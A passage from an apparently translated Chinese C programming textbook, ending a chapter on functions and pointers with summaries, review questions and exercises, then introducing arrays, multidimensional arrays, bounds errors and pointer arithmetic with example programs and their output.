熟悉Pascal和Modula-2的读者应该看出第1种形式和Pascal的值参数相 同,第2种形式和Pascal的变量参数类似。C++程序员可能认为,既然C和 C++都使用指针变量,那么C应该也有引用变量。让他们失望了,C没有引 用变量。对BASIC程序员而言,可能很难理解整个程序。如果觉得本节的内 容晦涩难懂,请多做一些相关的编程练习,你会发现指针非常简单实用(见 图9.6)。 629 图9.6 按字节寻址系统(如PC)中变量的名称、地址和值 变量:名称、地址和值 通过前面的讨论发现,变量的名称、地址和变量的值之间关系密切。我 们来进一步分析。 编写程序时,可以认为变量有两个属性:名称和值(还有其他性质,如 类型,暂不讨论)。计算机编译和加载程序后,认为变量也有两个属性:地 址和值。地址就是变量在计算机内部的名称。 在许多语言中,地址都归计算机管,对程序员隐藏。然而在 C 中,可 以通过&运算符访问地址,通过*运算符获得地址上的值。例如,&barn表示 变量barn的地址,使用函数名即可获得变量的数值。例如,printf("%d\n", barn)打印barn的值,使用*运算符即可获得储存在地址上的值。如果pbarn= &barn;,那么*pbarn表示的是储存在&barn地址上的值。 简而言之,普通变量把值作为基本量,把地址作为通过&运算符获得的 派生量,而指针变量把地址作为基本量,把值作为通过*运算符获得的派生 量。 虽然打印地址可以满足读者好奇心,但是这并不是&运算符的主要用 途。更重要的是使用&、*和指针可以操纵地址和地址上的内容,如swap3.c 630 程序(程序清单9.15)所示。 小结:函数 形式: 典型的ANSI C函数的定义形式为: 返回类型 名称(形参声明列表) 函数体 形参声明列表是用逗号分隔的一系列变量声明。除形参变量外,函数的 其他变量均在函数体的花括号之内声明。 示例: int diff(int x, int y) // ANSI C { // 函数体开始 int z;     // 声明局部变量 z = x - y; return z; // 返回一个值 } // 函数体结束 传递值: 实参用于把值从主调函数传递给被调函数。如果变量a和b的值分别是5 和2,那么调用: c = diff(a,b); 把5和2分别传递给变量x和y。5和2称为实际参数(简称实参),diff()函 631 数定义中的变量x和y称为形式参数(简称形参)。使用关键字return把被调 函数中的一个值传回主调函数。本例中, c接受z的值3。被调函数一般不会 改变主调函数中的变量,如果要改变,应使用指针作为参数。如果希望把更 多的值传回主调函数,必须这么做。 函数的返回类型: 函数的返回类型指的是函数返回值的类型。如果返回值的类型与声明的 返回类型不匹配,返回值将被转换成函数声明的返回类型。 函数签名: 函数的返回类型和形参列表构成了函数签名。因此,函数签名指定了传 入函数的值的类型和函数返回值的类型。 示例: double duff(double, int); // 函数原型 int main(void) { double q, x; int n; ... q = duff(x,n);     //函数调用 ... } double duff(double u, int k)  //函数定义 632 { double tor; ... return tor;  //返回double类型的值 } 633 9.8 关键概念 如果想用C编出高效灵活的程序,必须理解函数。把大型程序组织成若 干函数非常有用,甚至很关键。如果让一个函数处理一个任务,程序会更好 理解,更方便调试。要理解函数是如何把信息从一个函数传递到另一函数, 也就是说,要理解函数参数和返回值的工作原理。另外,要明白函数形参和 其他局部变量都属于函数私有,因此,声明在不同函数中的同名变量是完全 不同的变量。而且,函数无法直接访问其他函数中的变量。这种限制访问保 护了数据的完整性。但是,当确实需要在函数中访问另一个函数的数据时, 可以把指针作为函数的参数。 634 9.9 本章小结 函数可以作为组成大型程序的构件块。每个函数都应该有一个单独且定 义好的功能。使用参数把值传给函数,使用关键字return把值返回函数。如 果函数返回的值不是int类型,则必须在函数定义和函数原型中指定函数的类 型。如果需要在被调函数中修改主调函数的变量,使用地址或指针作为参 数。 ANSI C提供了一个强大的工具——函数原型,允许编译器验证函数调 用中使用的参数个数和类型是否正确。 C 函数可以调用本身,这种调用方式被称为递归。一些编程问题要用递 归来解决,但是递归不仅消耗内存多,效率不高,而且费时。 635 9.10 复习题 复习题的参考答案在附录A中。 1.实际参数和形式参数的区别是什么? 
2.根据下面各函数的描述,分别编写它们的ANSI C函数头。注意,只需 写出函数头,不用写函数体。 a.donut()接受一个int类型的参数,打印若干(参数指定数目)个0 b.gear()接受两个int类型的参数,返回int类型的值 c.guess()不接受参数,返回一个int类型的值 d.stuff_it()接受一个double类型的值和double类型变量的地址,把第1个 值储存在指定位置 3.根据下面各函数的描述,分别编写它们的ANSI C函数头。注意,只需 写出函数头,不用写函数体。 a.n_to_char()接受一个int类型的参数,返回一个char类型的值 b.digit()接受一个double类型的参数和一个int类型的参数,返回一个int类 型的值 c.which()接受两个可储存double类型变量的地址,返回一个double类型 的地址 d.random()不接受参数,返回一个int类型的值 4.设计一个函数,返回两整数之和。 5.如果把复习题4改成返回两个double类型的值之和,应如何修改函数? 6.设计一个名为alter()的函数,接受两个int类型的变量x和y,把它们的 636 值分别改成两个变量之和以及两变量之差。 7.下面的函数定义是否正确? void salami(num) { int num, count; for (count = 1; count <= num; num++) printf(" O salami mio!\n"); } 8.编写一个函数,返回3个整数参数中的最大值。 9.给定下面的输出: Please choose one of the following: 1) copy files         2) move files 3) remove files       4) quit Enter the number of your choice: a.编写一个函数,显示一份有4个选项的菜单,提示用户进行选择(输 出如上所示)。 b.编写一个函数,接受两个int类型的参数分别表示上限和下限。该函数 从用户的输入中读取整数。如果整数超出规定上下限,函数再次打印菜单 (使用a部分的函数)提示用户输入,然后获取一个新值。如果用户输入的 整数在规定范围内,该函数则把该整数返回主调函数。如果用户输入一个非 整数字符,该函数应返回4。 637 c.使用本题a和b部分的函数编写一个最小型的程序。最小型的意思是, 该程序不需要实现菜单中各选项的功能,只需显示这些选项并获取有效的响 应即可。 638 9.11 编程练习 1.设计一个函数min(x, y),返回两个double类型值的较小值。在一个简单 的驱动程序中测试该函数。 2.设计一个函数chline(ch, i, j),打印指定的字符j行i列。在一个简单的驱 动程序中测试该函数。 3.编写一个函数,接受3个参数:一个字符和两个整数。字符参数是待 打印的字符,第1个整数指定一行中打印字符的次数,第2个整数指定打印指 定字符的行数。编写一个调用该函数的程序。 4.两数的调和平均数这样计算:先得到两数的倒数,然后计算两个倒数 的平均值,最后取计算结果的倒数。编写一个函数,接受两个double类型的 参数,返回这两个参数的调和平均数。 5.编写并测试一个函数larger_of(),该函数把两个double类型变量的值替 换为较大的值。例如, larger_of(x, y)会把x和y中较大的值重新赋给两个变 量。 6.编写并测试一个函数,该函数以3个double变量的地址作为参数,把最 小值放入第1个函数,中间值放入第2个变量,最大值放入第3个变量。 7.编写一个函数,从标准输入中读取字符,直到遇到文件结尾。程序要 报告每个字符是否是字母。如果是,还要报告该字母在字母表中的数值位 置。例如,c和C在字母表中的位置都是3。合并一个函数,以一个字符作为 参数,如果该字符是一个字母则返回一个数值位置,否则返回-1。 8.第6章的程序清单6.20中,power()函数返回一个double类型数的正整数 次幂。改进该函数,使其能正确计算负幂。另外,函数要处理0的任何次幂 都为0,任何数的0次幂都为1(函数应报告0的0次幂未定义,因此把该值处 理为1)。要使用一个循环,并在程序中测试该函数。 639 9.使用递归函数重写编程练习8。 10.为了让程序清单9.8中的to_binary()函数更通用,编写一个to_base_n() 函数接受两个在2~10范围内的参数,然后以第2个参数中指定的进制打印第 1个参数的数值。例如,to_base_n(129, 8)显示的结果为201,也就是129的 八进制数。在一个完整的程序中测试该函数。 11.编写并测试Fibonacci()函数,该函数用循环代替递归计算斐波那契 数。 640 第10章 数组和指针 本章介绍以下内容: 关键字:static 运算符:&、*(一元) 如何创建并初始化数组 指针(在已学过的基础上)、指针和数组的关系 编写处理数组的函数 二维数组 人们通常借助计算机完成统计每月的支出、日降雨量、季度销售额等任 务。企业借助计算机管理薪资、库存和客户交易记录等。作为程序员,不可 避免地要处理大量相关数据。通常,数组能高效便捷地处理这种数据。第 6 章简单地介绍了数组,本章将进一步地学习如何使用数组,着重分析如何编 写处理数组的函数。这种函数把模块化编程的优势应用到数组。通过本章的 学习,你将明白数组和指针关系密切。 641 10.1 数组 前面介绍过,数组由数据类型相同的一系列元素组成。需要使用数组 时,通过声明数组告诉编译器数组中内含多少元素和这些元素的类型。编译 器根据这些信息正确地创建数组。普通变量可以使用的类型,数组元素都可 以用。考虑下面的数组声明: /* 一些数组声明*/ int main(void) { float candy[365];    /* 内含365个float类型元素的数组 */ char code[12];     /*内含12个char类型元素的数组*/ int states[50];     /*内含50个int类型元素的数组 */ ... } 方括号([])表明candy、code和states都是数组,方括号中的数字表明 数组中的元素个数。 要访问数组中的元素,通过使用数组下标数(也称为索引)表示数组中 的各元素。数组元素的编号从0开始,所以candy[0]表示candy数组的第1个元 素,candy[364]表示第365个元素,也就是最后一个元素。读者对这些内容应 该比较熟悉,下面我们介绍一些新内容。 10.1.1 初始化数组 数组通常被用来储存程序需要的数据。例如,一个内含12个整数元素的 数组可以储存12个月的天数。在这种情况下,在程序一开始就初始化数组比 642 较好。下面介绍初始化数组的方法。 只储存单个值的变量有时也称为标量变量(scalar variable),我们已经 很熟悉如何初始化这种变量: int fix = 1; float flax = PI * 2; 代码中的PI已定义为宏。C使用新的语法来初始化数组,如下所示: int main(void) { int powers[8] = {1,2,4,6,8,16,32,64}; /* 从ANSI C开始支持这种初始化 */ ... 
} 如上所示,用以逗号分隔的值列表(用花括号括起来)来初始化数组, 各值之间用逗号分隔。在逗号和值之间可以使用空格。根据上面的初始化, 把 1 赋给数组的首元素(powers[0]),以此类推(不支持ANSI的编译器会 把这种形式的初始化识别为语法错误,在数组声明前加上关键字static可解 决此问题。第12章将详细讨论这个关键字)。 程序清单10.1演示了一个小程序,打印每个月的天数。 程序清单10.1 day_mon1.c程序 /* day_mon1.c -- 打印每个月的天数 */ #include <stdio.h> #define MONTHS 12 643 int main(void) { int days[MONTHS] = { 31, 28, 31, 30, 31, 30, 31, 31,  30, 31, 30, 31 }; int index; for (index = 0; index < MONTHS; index++) printf("Month %2d has %2d days.\n", index + 1, days[index]); return 0; } 该程序的输出如下: Month 1 has 31 days. Month 2 has 28 days. Month 3 has 31 days. Month 4 has 30 days. Month 5 has 31 days. Month 6 has 30 days. Month 7 has 31 days. Month 8 has 31 days. Month 9 has 30 days. 644 Month 10 has 31 days. Month 11 has 30 days. Month 12 has 31 days. 这个程序还不够完善,每4年打错一个月份的天数(即,2月份的天 数)。该程序用初始化列表初始化days[],列表(用花括号括起来)中用逗 号分隔各值。 注意该例使用了符号常量 MONTHS 表示数组大小,这是我们推荐且常 用的做法。例如,如果要采用一年13个月的记法,只需修改#define这行代码 即可,不用在程序中查找所有使用过数组大小的地方。 注意 使用const声明数组 有时需要把数组设置为只读。这样,程序只能从数组中检索值,不能把 新值写入数组。要创建只读数组,应该用const声明和初始化数组。因此, 程序清单10.1中初始化数组应改成: const int days[MONTHS] = {31,28,31,30,31,30,31,31,30,31,30,31}; 这样修改后,程序在运行过程中就不能修改该数组中的内容。和普通变 量一样,应该使用声明来初始化 const 数据,因为一旦声明为 const,便不能 再给它赋值。明确了这一点,就可以在后面的例子中使用const了。 如果初始化数组失败怎么办?程序清单10.2演示了这种情况。 程序清单10.2 no_data.c程序 /* no_data.c -- 为初始化数组 */ #include <stdio.h> #define SIZE 4 645 int main(void) { int no_data[SIZE]; /* 未初始化数组 */ int i; printf("%2s%14s\n",   "i", "no_data[i]"); for (i = 0; i < SIZE; i++) printf("%2d%14d\n", i, no_data[i]); return 0; } 该程序的输出如下(系统不同,输出的结果可能不同): i   no_data[i] 0          0 1      4204937 2      4219854 3   2147348480 使用数组前必须先初始化它。与普通变量类似,在使用数组元素之前, 必须先给它们赋初值。编译器使用的值是内存相应位置上的现有值,因此, 读者运行该程序后的输出会与该示例不同。 注意 存储类别警告 数组和其他变量类似,可以把数组创建成不同的存储类别(storage 646 class)。第12章将介绍存储类别的相关内容,现在只需记住:本章描述的数 组属于自动存储类别,意思是这些数组在函数内部声明,且声明时未使用关 键字static。到目前为止,本书所用的变量和数组都是自动存储类别。 在这里提到存储类别的原因是,不同的存储类别有不同的属性,所以不 能把本章的内容推广到其他存储类别。对于一些其他存储类别的变量和数 组,如果在声明时未初始化,编译器会自动把它们的值设置为0。 初始化列表中的项数应与数组的大小一致。如果不一致会怎样?我们还 是以上一个程序为例,但初始化列表中缺少两个元素,如程序清单10.3所 示: 程序清单10.3 somedata.c程序 /* some_data.c -- 部分初始化数组 */ #include <stdio.h> #define SIZE 4 int main(void) { int some_data[SIZE] = { 1492, 1066 }; int i; printf("%2s%14s\n",   "i", "some_data[i]"); for (i = 0; i < SIZE; i++) printf("%2d%14d\n", i, some_data[i]); return 0; 647 } 下面是该程序的输出: i some_data[i] 0       1492 1       1066 2         0 3         0 如上所示,编译器做得很好。当初始化列表中的值少于数组元素个数 时,编译器会把剩余的元素都初始化为0。也就是说,如果不初始化数组, 数组元素和未初始化的普通变量一样,其中储存的都是垃圾值;但是,如果 部分初始化数组,剩余的元素就会被初始化为0。 如果初始化列表的项数多于数组元素个数,编译器可没那么仁慈,它会 毫不留情地将其视为错误。但是,没必要因此嘲笑编译器。其实,可以省略 方括号中的数字,让编译器自动匹配数组大小和初始化列表中的项数(见程 序清单10.4) 程序清单10.4 day_mon2.c程序 /* day_mon2.c -- 让编译器计算元素个数 */ #include <stdio.h> int main(void) { const int days[] = { 31, 28, 31, 30, 31, 30, 31, 31,  30, 31 }; 648 int index; for (index = 0; index < sizeof days / sizeof days[0];  index++) printf("Month %2d has %d days.\n", index + 1, days[index]); return 0; } 在程序清单10.4中,要注意以下两点。 如果初始化数组时省略方括号中的数字,编译器会根据初始化列表中的 项数来确定数组的大小。 注意for循环中的测试条件。由于人工计算容易出错,所以让计算机来 计算数组的大小。sizeof运算符给出它的运算对象的大小(以字节为单 位)。所以sizeof days是整个数组的大小(以字节为单位),sizeof day[0]是 数组中一个元素的大小(以字节为单位)。整个数组的大小除以单个元素的 大小就是数组元素的个数。 下面是该程序的输出: Month 1 has 31 days. Month 2 has 28 days. Month 3 has 31 days. Month 4 has 30 days. Month 5 has 31 days. Month 6 has 30 days. 649 Month 7 has 31 days. Month 8 has 31 days. Month 9 has 30 days. Month 10 has 31 days. 
我们的本意是防止初始化值的个数超过数组的大小,让程序找出数组大 小。我们初始化时用了10个值,结果就只打印了10个值!这就是自动计数的 弊端:无法察觉初始化列表中的项数有误。 还有一种初始化数组的方法,但这种方法仅限于初始化字符数组。我们 在下一章中介绍。 10.1.2 指定初始化器(C99) C99 增加了一个新特性:指定初始化器(designated initializer)。利用 该特性可以初始化指定的数组元素。例如,只初始化数组中的最后一个元 素。对于传统的C初始化语法,必须初始化最后一个元素之前的所有元素, 才能初始化它: int arr[6] = {0,0,0,0,0,212}; // 传统的语法 而C99规定,可以在初始化列表中使用带方括号的下标指明待初始化的 元素: int arr[6] = {[5] = 212}; // 把arr[5]初始化为212 对于一般的初始化,在初始化一个元素后,未初始化的元素都会被设置 为0。程序清单10.5中的初始化比较复杂。 程序清单10.5 designate.c程序 // designate.c -- 使用指定初始化器 650 #include <stdio.h> #define MONTHS 12 int main(void) { int days[MONTHS] = { 31, 28, [4] = 31, 30, 31, [1]  = 29 }; int i; for (i = 0; i < MONTHS; i++) printf("%2d  %d\n", i + 1, days[i]); return 0; } 该程序在支持C99的编译器中输出如下: 1   31 2   29 3   0 4   0 5   31 6   30 7   31 651 8   0 9   0 10   0 11   0 12   0 以上输出揭示了指定初始化器的两个重要特性。第一,如果指定初始化 器后面有更多的值,如该例中的初始化列表中的片段:[4] = 31,30,31,那么 后面这些值将被用于初始化指定元素后面的元素。也就是说,在days[4]被初 始化为31后,days[5]和days[6]将分别被初始化为30和31。第二,如果再次初 始化指定的元素,那么最后的初始化将会取代之前的初始化。例如,程序清 单10.5中,初始化列表开始时把days[1]初始化为28,但是days[1]又被后面的 指定初始化[1] = 29初始化为29。 如果未指定元素大小会怎样? int stuff[] = {1, [6] = 23};     //会发生什么? int staff[] = {1, [6] = 4, 9, 10}; //会发生什么? 编译器会把数组的大小设置为足够装得下初始化的值。所以,stuff数组 有7个元素,编号为0~6;而staff数组的元素比stuff数组多两个(即有9个元 素)。 10.1.3 给数组元素赋值 声明数组后,可以借助数组下标(或索引)给数组元素赋值。例如,下 面的程序段给数组的所有元素赋值: /* 给数组的元素赋值 */ 652 #include <stdio.h> #define SIZE 50 int main(void) { int counter, evens[SIZE]; for (counter = 0; counter < SIZE; counter++) evens[counter] = 2 * counter; ... } 注意这段代码中使用循环给数组的元素依次赋值。C 不允许把数组作为 一个单元赋给另一个数组,除初始化以外也不允许使用花括号列表的形式赋 值。下面的代码段演示了一些错误的赋值形式: /* 一些无效的数组赋值 */ #define SIZE 5 int main(void) { int oxen[SIZE] = {5,3,2,8};     /* 初始化没问题 */ int yaks[SIZE]; yaks = oxen;          /* 不允许 */ yaks[SIZE] = oxen[SIZE];    /* 数组下标越界 */ 653 yaks[SIZE] = {5,3,2,8};    /* 不起作用 */ oxen数组的最后一个元素是oxen[SIZE-1],所以oxen[SIZE]和yaks[SIZE] 都超出了两个数组的末尾。 10.1.4 数组边界 在使用数组时,要防止数组下标超出边界。也就是说,必须确保下标是 有效的值。例如,假设有下面的声明: int doofi[20]; 那么在使用该数组时,要确保程序中使用的数组下标在0~19的范围 内,因为编译器不会检查出这种错误(但是,一些编译器发出警告,然后继 续编译程序)。 考虑程序清单10.6的问题。该程序创建了一个内含4个元素的数组,然 后错误地使用了-1~6的下标。 程序清单10.6 bounds.c程序 // bounds.c -- 数组下标越界 #include <stdio.h> #define SIZE 4 int main(void) { int value1 = 44; int arr[SIZE]; int value2 = 88; 654 int i; printf("value1 = %d, value2 = %d\n", value1, value2); for (i = -1; i <= SIZE; i++) arr[i] = 2 * i + 1; for (i = -1; i < 7; i++) printf("%2d %d\n", i, arr[i]); printf("value1 = %d, value2 = %d\n", value1, value2); printf("address of arr[-1]: %p\n", &arr[-1]); printf("address of arr[4]: %p\n", &arr[4]); printf("address of value1: %p\n", &value1); printf("address of value2: %p\n", &value2); return 0; } 编译器不会检查数组下标是否使用得当。在C标准中,使用越界下标的 结果是未定义的。这意味着程序看上去可以运行,但是运行结果很奇怪,或 异常中止。下面是使用GCC的输出示例: value1 = 44, value2 = 88 -1 -1 0 1 1 3 655 2 5 3 7 4 9 5 1624678494 6 32767 value1 = 9, value2 = -1 address of arr[-1]:  0x7fff5fbff8cc address of arr[4]:  0x7fff5fbff8e0 address of value1:  0x7fff5fbff8e0 address of value2:  0x7fff5fbff8cc 注意,该编译器似乎把value2储存在数组的前一个位置,把value1储存 在数组的后一个位置(其他编译器在内存中储存数据的顺序可能不同)。在 上面的输出中,arr[-1]与value2对应的内存地址相同, arr[4]和value1对应的 内存地址相同。因此,使用越界的数组下标会导致程序改变其他变量的值。 不同的编译器运行该程序的结果可能不同,有些会导致程序异常中止。 C 语言为何会允许这种麻烦事发生?这要归功于 C 信任程序员的原 则。不检查边界,C 程序可以运行更快。编译器没必要捕获所有的下标错 误,因为在程序运行之前,数组的下标值可能尚未确定。因此,为安全起 见,编译器必须在运行时添加额外代码检查数组的每个下标值,这会降低程 序的运行速度。C 相信程序员能编写正确的代码,这样的程序运行速度更 快。但并不是所有的程序员都能做到这一点,所以就出现了下标越界的问 题。 还要记住一点:数组元素的编号从0开始。最好是在声明数组时使用符 656 号常量来表示数组的大小: #define SIZE 4 int main(void) { int arr[SIZE]; for (i = 0; i < SIZE; i++) .... 
这样做能确保整个程序中的数组大小始终一致。 10.1.5 指定数组的大小 本章前面的程序示例都使用整型常量来声明数组: #define SIZE 4 int main(void) { int arr[SIZE];     // 整数符号常量 double lots[144];    // 整数字面常量 ... 在C99标准之前,声明数组时只能在方括号中使用整型常量表达式。所 谓整型常量表达式,是由整型常量构成的表达式。sizeof表达式被视为整型 常量,但是(与C++不同)const值不是。另外,表达式的值必须大于0: int n = 5; 657 int m = 8; float a1[5];         // 可以 float a2[5*2 + 1];     //可以 float a3[sizeof(int) + 1]; //可以 float a4[-4];        // 不可以,数组大小必须大于0 float a5[0];         // 不可以,数组大小必须大于0 float a6[2.5];        // 不可以,数组大小必须是整数 float a7[(int)2.5];     // 可以,已被强制转换为整型常量 float a8[n];         // C99之前不允许 float a9[m];         // C99之前不允许 上面的注释表明,以前支持C90标准的编译器不允许后两种声明方式。 而C99标准允许这样声明,这创建了一种新型数组,称为变长数组 (variable-length array)或简称 VLA(C11 放弃了这一创新的举措,把VLA 设定为可选,而不是语言必备的特性)。 C99引入变长数组主要是为了让C成为更好的数值计算语言。例如, VLA简化了把FORTRAN现有的数值计算例程库转换为C代码的过程。VLA有 一些限制,例如,声明VLA时不能进行初始化。在充分了解经典的C数组 后,我们再详细介绍VLA。 658 10.2 多维数组 气象研究员Tempest Cloud为完成她的研究项目要分析5年内每个月的降 水量数据,她首先要解决的问题是如何表示数据。一个方案是创建60个变 量,每个变量储存一个数据项(我们曾经提到过这一笨拙的方案,和以前一 样,这个方案并不合适)。使用一个内含60个元素的数组比将建60个变量 好,但是如果能把各年的数据分开储存会更好,即创建5个数组,每个数组 12个元素。然而,这样做也很麻烦,如果Tempest决定研究50年的降水量, 岂不是要创建50个数组。是否能有更好的方案? 处理这种情况应该使用数组的数组。主数组(master array)有5个元素 (每个元素表示一年),每个元素是内含12个元素的数组(每个元素表示一 个月)。下面是该数组的声明: float rain[5][12]; // 内含5个数组元素的数组,每个数组元素内含12个 float类型的元素 理解该声明的一种方法是,先查看中间部分(粗体部分): float rain[5][12]; // rain是一个内含5个元素的数组 这说明数组rain有5个元素,至于每个元素的情况,要查看声明的其余 部分(粗体部分): floatrain[5][12] ; // 一个内含12个float类型元素的数组 这说明每个元素的类型是float[12],也就是说,rain的每个元素本身都 是一个内含12个float类型值的数组。 根据以上分析可知,rain的首元素rain[0]是一个内含12个float类型值的 数组。所以,rain[1]、rain[2]等也是如此。如果 rain[0]是一个数组,那么它 的首元素就是 rain[0][0],第 2 个元素是rain[0][1],以此类推。简而言之, 数组rain有5个元素,每个元素都是内含12个float类型元素的数组,rain[0]是 659 内含12个float值的数组,rain[0][0]是一个float类型的值。假设要访问位于2 行3列的值,则使用rain[2][3](记住,数组元素的编号从0开始,所以2行指 的是第3行)。 图10.1 二维数组 该二维视图有助于帮助读者理解二维数组的两个下标。在计算机内部, 这样的数组是按顺序储存的,从第1个内含12个元素的数组开始,然后是第2 个内含12个元素的数组,以此类推。 我们要在气象分析程序中用到这个二维数组。该程序的目标是,计算每 年的总降水量、年平均降水量和月平均降水量。要计算年总降水量,必须对 一行数据求和;要计算某月份的平均降水量,必须对一列数据求和。二维数 组很直观,实现这些操作也很容易。程序清单10.7演示了这个程序。 程序清单10.7 rain.c程序 /* rain.c -- 计算每年的总降水量、年平均降水量和5年中每月的平均降 水量 */ #include <stdio.h> 660 #define MONTHS 12   // 一年的月份数 #define YEARS  5    // 年数 int main(void) { // 用2010~2014年的降水量数据初始化数组 const float rain[YEARS][MONTHS] = { { 4.3, 4.3, 4.3, 3.0, 2.0, 1.2, 0.2, 0.2, 0.4, 2.4, 3.5,  6.6 }, { 8.5, 8.2, 1.2, 1.6, 2.4, 0.0, 5.2, 0.9, 0.3, 0.9, 1.4,  7.3 }, { 9.1, 8.5, 6.7, 4.3, 2.1, 0.8, 0.2, 0.2, 1.1, 2.3, 6.1,  8.4 }, { 7.2, 9.9, 8.4, 3.3, 1.2, 0.8, 0.4, 0.0, 0.6, 1.7, 4.3,  6.2 }, { 7.6, 5.6, 3.8, 2.8, 3.8, 0.2, 0.0, 0.0, 0.0, 1.3, 2.6,  5.2 } }; int year, month; float subtot, total; printf(" YEAR   RAINFALL  (inches)\n"); 661 for (year = 0, total = 0; year < YEARS; year++) {             // 每一年,各月的降水量总和 for (month = 0, subtot = 0; month < MONTHS; month++) subtot += rain[year][month]; printf("%5d %15.1f\n", 2010 + year, subtot); total += subtot;  // 5年的总降水量 } printf("\nThe yearly average is %.1f inches.\n\n", total /  YEARS); printf("MONTHLY AVERAGES:\n\n"); printf(" Jan  Feb  Mar  Apr  May  Jun  Jul  Aug  Sep  Oct "); printf(" Nov  Dec\n"); for (month = 0; month < MONTHS; month++) {             // 每个月,5年的总降水量 for (year = 0, subtot = 0; year < YEARS; year++) subtot += rain[year][month]; printf("%4.1f ", subtot / YEARS); } printf("\n"); 662 return 0; } 下面是该程序的输出: YEAR   RAINFALL  (inches) 2010        32.4 2011        37.9 2012        49.8 2013        44.0 2014        32.9 The yearly average is 39.4 inches. 
MONTHLY AVERAGES: Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 7.3 7.3 4.9 3.0 2.3 0.6 1.2 0.3 0.5 1.7 3.6 6.7 学习该程序的重点是数组初始化和计算方案。初始化二维数组比较复 杂,我们先来看较为简单的计算部分。 程序使用了两个嵌套for循环。第1个嵌套for循环的内层循环,在year不 变的情况下,遍历month计算某年的总降水量;而外层循环,改变year的 值,重复遍历month,计算5年的总降水量。这种嵌套循环结构常用于处理二 维数组,一个循环处理数组的第1个下标,另一个循环处理数组的第2个下 标: for (year = 0, total = 0; year < YEARS; year++) 663 { // 处理每一年的数据 for (month = 0, subtot = 0; month < MONTHS; month++) ...// 处理每月的数据 ...//处理每一年的数据 } 第2个嵌套for循环和第1个的结构相同,但是内层循环遍历year,外层循 环遍历month。记住,每执行一次外层循环,就完整遍历一次内层循环。因 此,在改变月份之前,先遍历完年,得到某月 5 年间的平均降水量,以此类 推: for (month = 0; month < MONTHS; month++) { // 处理每月的数据 for (year = 0, subtot =0; year < YEARS; year++) ...// 处理每年的数据 ...// 处理每月的数据 } 10.2.1 初始化二维数组 初始化二维数组是建立在初始化一维数组的基础上。首先,初始化一维 数组如下: sometype ar1[5] = {val1, val2, val3, val4, val5}; 这里,val1、val2等表示sometype类型的值。例如,如果sometype是int, 那么val1可能是7;如果sometype是double,那么val1可能是11.34,诸如此 664 类。但是rain是一个内含5个元素的数组,每个元素又是内含12个float类型元 素的数组。所以,对rain而言,val1应该包含12个值,用于初始化内含12个 float类型元素的一维数组,如下所示: {4.3,4.3,4.3,3.0,2.0,1.2,0.2,0.2,0.4,2.4,3.5,6.6} 也就是说,如果sometype是一个内含12个double类型元素的数组,那么 val1就是一个由12个double类型值构成的数值列表。因此,为了初始化二维 数组rain,要用逗号分隔5个这样的数值列表: const float rain[YEARS][MONTHS] = { {4.3,4.3,4.3,3.0,2.0,1.2,0.2,0.2,0.4,2.4,3.5,6.6}, {8.5,8.2,1.2,1.6,2.4,0.0,5.2,0.9,0.3,0.9,1.4,7.3}, {9.1,8.5,6.7,4.3,2.1,0.8,0.2,0.2,1.1,2.3,6.1,8.4}, {7.2,9.9,8.4,3.3,1.2,0.8,0.4,0.0,0.6,1.7,4.3,6.2}, {7.6,5.6,3.8,2.8,3.8,0.2,0.0,0.0,0.0,1.3,2.6,5.2} }; 这个初始化使用了5个数值列表,每个数值列表都用花括号括起来。第1 个列表的数据用于初始化数组的第1行,第2个列表的数据用于初始化数组的 第2行,以此类推。前面讨论的数据个数和数组大小不匹配的问题同样适用 于这里的每一行。也就是说,如果第1个列表中只有10个数,则只会初始化 数组第1行的前10个元素,而最后两个元素将被默认初始化为0。如果某列表 中的数值个数超出了数组每行的元素个数,则会出错,但是这并不会影响其 他行的初始化。 初始化时也可省略内部的花括号,只保留最外面的一对花括号。只要保 665 证初始化的数值个数正确,初始化的效果与上面相同。但是如果初始化的数 值不够,则按照先后顺序逐行初始化,直到用完所有的值。后面没有值初始 化的元素被统一初始化为0。图10.2演示了这种初始化数组的方法。 图10.2 初始化二维数组的两种方法 因为储存在数组rain中的数据不能修改,所以程序使用了const关键字声 明该数组。 10.2.2 其他多维数组 前面讨论的二维数组的相关内容都适用于三维数组或更多维的数组。可 以这样声明一个三维数组: int box[10][20][30]; 可以把一维数组想象成一行数据,把二维数组想象成数据表,把三维数 组想象成一叠数据表。例如,把上面声明的三维数组box想象成由10个二维 数组(每个二维数组都是20行30列)堆叠起来。 还有一种理解box的方法是,把box看作数组的数组。也就是说,box内 含10个元素,每个元素是内含20个元素的数组,这20个数组元素中的每个元 素是内含30个元素的数组。或者,可以简单地根据所需的下标值去理解数 组。 通常,处理三维数组要使用3重嵌套循环,处理四维数组要使用4重嵌套 循环。对于其他多维数组,以此类推。在后面的程序示例中,我们只使用二 维数组。 666 10.3 指针和数组 第9章介绍过指针,指针提供一种以符号形式使用地址的方法。因为计 算机的硬件指令非常依赖地址,指针在某种程度上把程序员想要传达的指令 以更接近机器的方式表达。因此,使用指针的程序更有效率。尤其是,指针 能有效地处理数组。我们很快就会学到,数组表示法其实是在变相地使用指 针。 我们举一个变相使用指针的例子:数组名是数组首元素的地址。也就是 说,如果flizny是一个数组,下面的语句成立: flizny == &flizny[0]; // 数组名是该数组首元素的地址 flizny 和&flizny[0]都表示数组首元素的内存地址(&是地址运算符)。 两者都是常量,在程序的运行过程中,不会改变。但是,可以把它们赋值给 指针变量,然后可以修改指针变量的值,如程序清单10.8所示。注意指针加 上一个数时,它的值发生了什么变化(转换说明%p通常以十六进制显示指 针的值)。 程序清单10.8 pnt_add.c程序 // pnt_add.c -- 指针地址 #include <stdio.h> #define SIZE 4 int main(void) { short dates[SIZE]; short * pti; 667 short index; double bills[SIZE]; double * ptf; pti = dates; // 把数组地址赋给指针 ptf = bills; printf("%23s %15s\n", "short", "double"); for (index = 0; index < SIZE; index++) printf("pointers + %d: %10p %10p\n", index, pti + index,  ptf + index); return 0; } 下面是该例的输出示例: short        double pointers + 0: 0x7fff5fbff8dc 0x7fff5fbff8a0 pointers + 1: 0x7fff5fbff8de 0x7fff5fbff8a8 pointers + 2: 0x7fff5fbff8e0 0x7fff5fbff8b0 pointers + 3: 0x7fff5fbff8e2 0x7fff5fbff8b8 第2行打印的是两个数组开始的地址,下一行打印的是指针加1后的地 址,以此类推。注意,地址是十六进制的,因此dd比dc大1,a1比a0大1。但 是,显示的地址是怎么回事? 668 0x7fff5fbff8dc + 1是否是0x7fff5fbff8de? 0x7fff5fbff8a0 + 1是否是0x7fff5fbff8a8? 
